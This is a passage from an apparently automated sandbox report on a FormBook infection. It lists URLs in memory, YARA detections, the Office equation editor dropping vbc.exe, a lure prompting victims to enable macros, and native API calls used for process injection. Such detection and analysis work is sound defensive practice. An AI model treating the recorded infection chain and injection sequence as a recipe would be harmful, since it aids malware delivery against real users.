Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/2019/08/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/2019/08/creative-portfolio-freelance/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/2019/08/creative-portfolio-my-creative-cv/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/2019/08/creative-portfolio-new-logo-concept/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/2020/08/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/2020/08/hello-world/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/2020/08/hello-world/#comment-1
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/category/uncategorized/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/comments/feed/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/d41d8-about/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/d41d8-blog/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/d41d8-contact/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/d41d8-portfolio-single/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/d41d8-portfolio/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/feed/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/wp-json/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/wp-login.php
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.paletciniz.com/xmlrpc.php?rsd
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2192884231.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000002.2389413507.0000000000260000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://api.w.org/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/plugins/coblocks/dist/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/plugins/kioken-blocks/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/plugins/otter-blocks/v
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/themes/neve/assets/js/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/themes/neve/style.min.
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-content/uploads/2020/08/croppe
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/css/dist/block-librar
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/jquery/jquery.js?v
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/jquery/ui/core.min
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/jquery/ui/datepick
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/js/wp-embed.min.js?ve
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/wlwmanifest.xml?time=
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://themeisle.com/themes/neve/
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: https://wordpress.org/

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: document is protected 17 18 19 20 21 Open the document m If INS documcn: was 22 Mkrosoft Offkc
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E91100 GetProcAddress,GetProcAddress,GetConsoleWindow,ShowWindow,RpcMgmtEpEltInqBegin,NtCreateSection,NtMapViewOfSection,CloseHandle,CallWindowProcW, 4_2_00E91100
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419D60 NtCreateFile, 6_2_00419D60
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419E10 NtReadFile, 6_2_00419E10
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419E90 NtClose, 6_2_00419E90
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419F40 NtAllocateVirtualMemory, 6_2_00419F40
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419E0A NtReadFile, 6_2_00419E0A
Source: C:\Users\Public\vbc.exe Code function: 6_2_00419E8F NtClose, 6_2_00419E8F
Source: C:\Users\Public\vbc.exe Code function: 6_2_008500C4 NtCreateFile,LdrInitializeThunk, 6_2_008500C4
Source: C:\Users\Public\vbc.exe Code function: 6_2_00850048 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_00850048
Source: C:\Users\Public\vbc.exe Code function: 6_2_00850078 NtResumeThread,LdrInitializeThunk, 6_2_00850078
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084F9F0 NtClose,LdrInitializeThunk, 6_2_0084F9F0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084F900 NtReadFile,LdrInitializeThunk, 6_2_0084F900
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_0084FAD0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_0084FAE8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FBB8 NtQueryInformationToken,LdrInitializeThunk, 6_2_0084FBB8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_0084FB68
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FC90 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_0084FC90
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FC60 NtMapViewOfSection,LdrInitializeThunk, 6_2_0084FC60
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FD8C NtDelayExecution,LdrInitializeThunk, 6_2_0084FD8C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_0084FDC0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FEA0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_0084FEA0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_0084FED0
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FFB4 NtCreateSection,LdrInitializeThunk, 6_2_0084FFB4
Source: C:\Users\Public\vbc.exe Code function: 6_2_008510D0 NtOpenProcessToken, 6_2_008510D0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00850060 NtQuerySection, 6_2_00850060
Source: C:\Users\Public\vbc.exe Code function: 6_2_008501D4 NtSetValueKey, 6_2_008501D4
Source: C:\Users\Public\vbc.exe Code function: 6_2_0085010C NtOpenDirectoryObject, 6_2_0085010C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00851148 NtOpenThread, 6_2_00851148
Source: C:\Users\Public\vbc.exe Code function: 6_2_008507AC NtCreateMutant, 6_2_008507AC
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084F8CC NtWaitForSingleObject, 6_2_0084F8CC
Source: C:\Users\Public\vbc.exe Code function: 6_2_00851930 NtSetContextThread, 6_2_00851930
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084F938 NtWriteFile, 6_2_0084F938
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FAB8 NtQueryValueKey, 6_2_0084FAB8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FA20 NtQueryInformationFile, 6_2_0084FA20
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FA50 NtEnumerateValueKey, 6_2_0084FA50
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FBE8 NtQueryVirtualMemory, 6_2_0084FBE8
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FB50 NtCreateKey, 6_2_0084FB50
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FC30 NtOpenProcess, 6_2_0084FC30
Source: C:\Users\Public\vbc.exe Code function: 6_2_00850C40 NtGetContextThread, 6_2_00850C40
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FC48 NtSetInformationFile, 6_2_0084FC48
Source: C:\Users\Public\vbc.exe Code function: 6_2_00851D80 NtSuspendThread, 6_2_00851D80
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FD5C NtEnumerateKey, 6_2_0084FD5C
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FE24 NtWriteVirtualMemory, 6_2_0084FE24
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FFFC NtCreateProcessEx, 6_2_0084FFFC
Source: C:\Users\Public\vbc.exe Code function: 6_2_0084FF34 NtQueueApcThread, 6_2_0084FF34
Source: C:\Users\Public\vbc.exe Code function: 6_2_00289862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 6_2_00289862
Source: C:\Users\Public\vbc.exe Code function: 6_2_00289DAE NtResumeThread,NtClose, 6_2_00289DAE
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023300C4 NtCreateFile,LdrInitializeThunk, 9_2_023300C4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023307AC NtCreateMutant,LdrInitializeThunk, 9_2_023307AC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FAB8 NtQueryValueKey,LdrInitializeThunk, 9_2_0232FAB8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_0232FAE8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_0232FAD0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_0232FB68
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FB50 NtCreateKey,LdrInitializeThunk, 9_2_0232FB50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_0232FBB8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232F900 NtReadFile,LdrInitializeThunk, 9_2_0232F900
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232F9F0 NtClose,LdrInitializeThunk, 9_2_0232F9F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_0232FED0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FFB4 NtCreateSection,LdrInitializeThunk, 9_2_0232FFB4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_0232FC60
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FD8C NtDelayExecution,LdrInitializeThunk, 9_2_0232FD8C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_0232FDC0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02330078 NtResumeThread, 9_2_02330078
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02330060 NtQuerySection, 9_2_02330060
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02330048 NtProtectVirtualMemory, 9_2_02330048
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023310D0 NtOpenProcessToken, 9_2_023310D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0233010C NtOpenDirectoryObject, 9_2_0233010C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02331148 NtOpenThread, 9_2_02331148
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_023301D4 NtSetValueKey, 9_2_023301D4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FA20 NtQueryInformationFile, 9_2_0232FA20
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FA50 NtEnumerateValueKey, 9_2_0232FA50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FBE8 NtQueryVirtualMemory, 9_2_0232FBE8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232F8CC NtWaitForSingleObject, 9_2_0232F8CC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02331930 NtSetContextThread, 9_2_02331930
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232F938 NtWriteFile, 9_2_0232F938
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FE24 NtWriteVirtualMemory, 9_2_0232FE24
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FEA0 NtReadVirtualMemory, 9_2_0232FEA0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FF34 NtQueueApcThread, 9_2_0232FF34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FFFC NtCreateProcessEx, 9_2_0232FFFC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FC30 NtOpenProcess, 9_2_0232FC30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02330C40 NtGetContextThread, 9_2_02330C40
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FC48 NtSetInformationFile, 9_2_0232FC48
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FC90 NtUnmapViewOfSection, 9_2_0232FC90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0232FD5C NtEnumerateKey, 9_2_0232FD5C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_02331D80 NtSuspendThread, 9_2_02331D80
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00089D60 NtCreateFile, 9_2_00089D60
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00089E10 NtReadFile, 9_2_00089E10
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00089E90 NtClose, 9_2_00089E90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00089F40 NtAllocateVirtualMemory, 9_2_00089F40
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00089E0A NtReadFile, 9_2_00089E0A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00089E8F NtClose, 9_2_00089E8F
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E9F0FF 4_2_00E9F0FF
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E9FCFF 4_2_00E9FCFF
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E9F8DF 4_2_00E9F8DF
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E9F4D3 4_2_00E9F4D3
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E9EC2A 4_2_00E9EC2A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E98B85 4_2_00E98B85
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E9C377 4_2_00E9C377
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041E87B 6_2_0041E87B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401030 6_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402D88 6_2_00402D88
Source: C:\Users\Public\vbc.exe Code function: 6_2_00402D90 6_2_00402D90
